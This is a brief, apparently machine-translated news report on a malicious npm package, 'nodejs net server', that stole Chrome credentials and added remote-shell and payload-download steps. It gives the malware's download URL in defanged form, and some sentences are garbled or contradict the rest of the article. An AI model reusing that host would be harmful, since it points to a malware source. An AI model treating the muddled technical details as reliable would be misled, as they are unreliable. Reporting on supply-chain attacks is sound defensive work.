14 DAY TRIAL // A software package available in the official NPM repository turned out to be a front for a program aimed at stealing stored credentials from the Chrome web browser, according to The Hacker News. After being reported yesterday, the malicious package was removed from the repository.
The malicious package is called "nodejs net server" and has been downloaded more than 1,283 times since February 2019. One questionable detail is that the associated repository leads to non-existent locations on GitHub.
While the original version of the package was only released to test the NPM package publishing process, the developer, named Chrunlee, made revisions with the purpose of implementing a remote shell capability. Then a script ("hxxps:/chrunlee.cn/a.exe") was added to download ChromePass, which was later changed to TeamViewer.
The malware developer had the smart idea of using a malicious variant of a real package called "jstest", a cross-platform JavaScript testing framework, to hijack the execution of service capable of file execution, camera and screen recording and file lookup.
Because of their popularity and ease of use, cybercriminals started to target package repositories
Karlo Zanki, a researcher at ReversingLabs, said the fake NPM package is not malicious by itself, but it can become dangerous if cybercriminals use it in a malicious way.
He explained further that the growing popularity and ease of use of software package repositories make them an excellent target for malware developers. It is uncommon for developers to perform rigorous security checks on existing libraries before including them in their projects, even if they do so to make building critical functionality faster and easier.
He added that the reason for this omission is due to the excessive number of potential vulnerabilities discovered in third-party code. If the package does not fix the problem, the next step is to try another one. This is a risky activity that can lead to the installation of malicious software.